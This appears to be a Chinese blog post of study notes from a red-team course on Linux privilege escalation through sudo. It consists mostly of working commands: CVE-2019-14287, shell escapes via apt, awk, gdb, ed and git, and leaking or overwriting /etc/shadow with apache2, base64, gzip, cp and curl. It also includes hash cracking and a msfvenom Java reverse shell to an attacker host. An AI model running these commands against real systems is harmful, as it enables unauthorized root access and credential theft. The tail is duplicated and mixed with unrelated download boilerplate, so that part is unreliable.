sudo风暴

sudo风暴

sudo -l 进行枚举,寻找相符合条件进行提权

欢迎关注微信公众号交流

qrcode_for_gh_e5fc05804a3e_430

CVE-2019-14287

sudo -u jack /bin/bash

sudo -u#1000 /bin/bash #另一种方式

sudo -u#-1 /bin/bash #-1会被sudo算法解释成0

利用条件:sudo版本1.8.28之前

image-20240523163643430

sudo apt

sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

  • -o指定APT选项
  • 冒号类似于名字空间,逐级访问子配置
  • 最终执行的是启动bash会话

image-20240523164129735

sudo apache2

sudo apache2 -f /etc/shadow
  • 执行时因为给定的配置文件是错误的,那么报错会显示root哈希值

image-20240523170222956

  • -f是对敏感文件进行泄露

image-20240523170200690

  • 如果用户名后有 y y y,则表明密码已使用yescrypt进行哈希处理
  • 使用format参数指定crypt

image-20240523170313346

sudo ash

image-20240523170607519

  • 新启一个bash会话获得新的交互性

  • ash本身就是一个shell

sudo awk

sudo awk 'BEGIN {system("/bin/bash")}'
  • 单引号内容为传递给awk的一个脚本
  • BEGIN 是awk的一个特殊模式,表示在处理任何输入之前执行的动作,而我们让他执行的动作是系统命令启动bin/bash的shell环境

image-20240523171116777

sudo base64

image-20240523171423611

声明一个变量

因为sudo有base64权限,我们先把声明变量进行编码然再进行解码,但是它看到的却是用sudo base64权限来完成的。这样我们就获得了敏感信息

image-20240523171823642

john破解

image-20240523172144907

base32、58、nc 等都可以同样方法

sudo bash

image-20240523172308250

  • 其他shell环境(本身就是shell):csh\dash\sh\tclsh\zsh

sudo cp

  • mkpasswd生成明文密码哈希
  • -m指定加密方法
  • 一般shadow为sha-512哈希加密

image-20240523172629186

将root哈希替换成刚刚生成的哈希

image-20240523172848937

声明一个环境变量RedteamNotes指向/etc/shadow

再声明一个TF=$(mktemp)指向是mktemp生成的临时文件

将生成的shadow记录写到TF变量之中

image-20240523173513149

image-20240523173741233

sudo cpulimit

sudo cpulimit -l 100 -f /bin/bash

-l 指定使用率100%

-f 指定程序按照-l参数去使用cpu比例

sudo curl

前期环境创造与sudo cp 相同

攻击机做一个sudo php的简易web服务器

image-20240523174739130

靶机执行

sudo curl http://192.168.218.145/shadow_entry -o /etc/shadow

-o 输出

sudo date

会泄露出敏感信息

image-20240523175114034

进行哈希值破解

sudo ed

sudo /usr/bin/ed
!/bin/bash

!执行系统命令

  • 2>/dev/null 扔掉垃圾信息

sudo env

env设置和显示变量的值

image-20240523180153631

sudo expect

image-20240523180742175

sudo find

image-20240523181600570

分号必须被转义,本身命令行的分隔符,不加反斜杠shell会将分号解释为命令分隔符,会导致exec没有结束,引发错误

sudo flock

协调多个进程对多个进程的访问

image-20240523182204299

sudo ftp

image-20240523182257672

sudo gcc

包装器-wrapper

,-s bash参数指定从标准输入读取命令,使bash在读取到eof时不会退出,

. gcc要编译内容

image-20240523182647676

sudo gdb

sudo gdb -nx -ex '!bash' -ex quit

image-20240523183614961

sudo git

sudo git branch --help

image-20240523183820179

image-20240523183759571

sudo gzip/gunzip

-t 检查压缩文件(试着去读取)

shadow时纯文本文件,在读取时会把信息显露出来

-f force 强制执行

sudo gzip -f /etc/shadow -t

sudo hping3

image-20240523184310288

sudo iftop

/bin/bash

sudo java

sudo msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f jar -o shell.jar

生成反弹shell

10.10.10.10为攻击机地址

开启简易服务器传递shell文件

sudo php -S 0:80

靶机进行下载wget

运行jar文件:java -jar shell.jar

攻击机监听4444端口

接受反弹

后续继续学习

「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

va -jar shell.jar

攻击机监听4444端口

接受反弹

后续继续学习

「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

53分钟

  • 29
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lu-fe1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值